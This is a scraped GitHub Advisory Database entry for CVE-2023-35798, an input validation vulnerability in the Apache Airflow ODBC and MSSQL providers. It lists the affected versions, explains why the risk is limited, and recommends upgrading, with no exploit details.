Input Validation vulnerability in Apache Software Foundation Apache Airflow ODBC Provider, Apache Software Foundation Apache Airflow MSSQL Provider.This vulnerability is considered low since it requires DAG code to use `get_sqlalchemy_connection` and someone with access to connection resources specifically updating the connection to exploit it.

This issue affects Apache Airflow ODBC Provider: before 4.0.0; Apache Airflow MSSQL Provider: before 3.4.1.

It is recommended to upgrade to a version that is not affected



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-35798

**Apache Airflow ODBC Provider, Apache Airflow MSSQL Provider Improper Input Validation vulnerability**

Moderate severity GitHub Reviewed Published Jun 27, 2023 to the GitHub Advisory Database • Updated Jun 30, 2023

**Package**

pip apache-airflow-providers-microsoft-mssql (pip)

**Affected versions**

< 3.4.1

pip apache-airflow-providers-odbc (pip)

**Description**

Published to the GitHub Advisory Database

Jun 27, 2023

Last updated

Jun 30, 2023

Tag

#microsoft